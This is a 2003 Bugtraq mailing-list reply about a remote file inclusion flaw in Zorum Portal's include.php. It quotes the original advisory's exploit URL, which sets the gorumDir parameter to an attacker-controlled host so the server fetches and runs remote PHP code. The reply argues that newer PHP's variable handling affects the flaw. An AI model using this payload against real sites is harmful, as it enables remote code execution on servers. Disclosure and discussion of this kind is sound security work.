Bugtraq mailing list archives
Re[2]: Zorum Portal (PHP)
From: Messer <igmpfrag () dezigner ru>
Date: Wed, 29 Jan 2003 07:39:37 +0300
Hello MGHz,
From: MGhz <magas () mail lt> To: bugtraq () securityfocus com Subject: Zorum Portal (PHP) Date: 22 Jan 2003 19:45:26 -0000 Version : 3.0;3.1;3.2 Website : http://zorum.phpoutsourcing.com/ Problem : Include file File: --------------------------------- include.php --------------------------------- PHP Code: --------------------------------- [...] include("$gorumDir/generformlib_multipleselection.php"); include("$gorumDir/generformlib_groupselection.php"); include("$gorumDir/generformlib_filebutton.php"); include("$gorumDir/group.php"); [...] --------------------------------- Exploit : --------------------------------- http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/ --> include http://[attacker]/group.php on remote server --------------------------------- -- magas () mail lt
In new versions of PHP (PHP 4.2.3 and higher) for reception of values transmitted to the form it's necessary to write: $Variable = $HTTP_GET_VARS ['var']; // Request Method - GET or $Variable = $HTTP_POST_VARS ['var']; // Request Method - POST // example: http://host.com/script.php?var1=value1&var2=value2 $Var_1 = $HTTP_GET_VARS['var1']; $Var_2 = $var2; // $Var_1 == "value1" // $Var_2 == "" Messer.
Current thread:
- Re: Zorum Portal (PHP) Frog Man (Jan 27)
- Re[2]: Zorum Portal (PHP) Messer (Jan 29)
- Re: Zorum Portal (PHP) MightyE (Jan 30)
- Re[2]: Zorum Portal (PHP) Messer (Jan 29)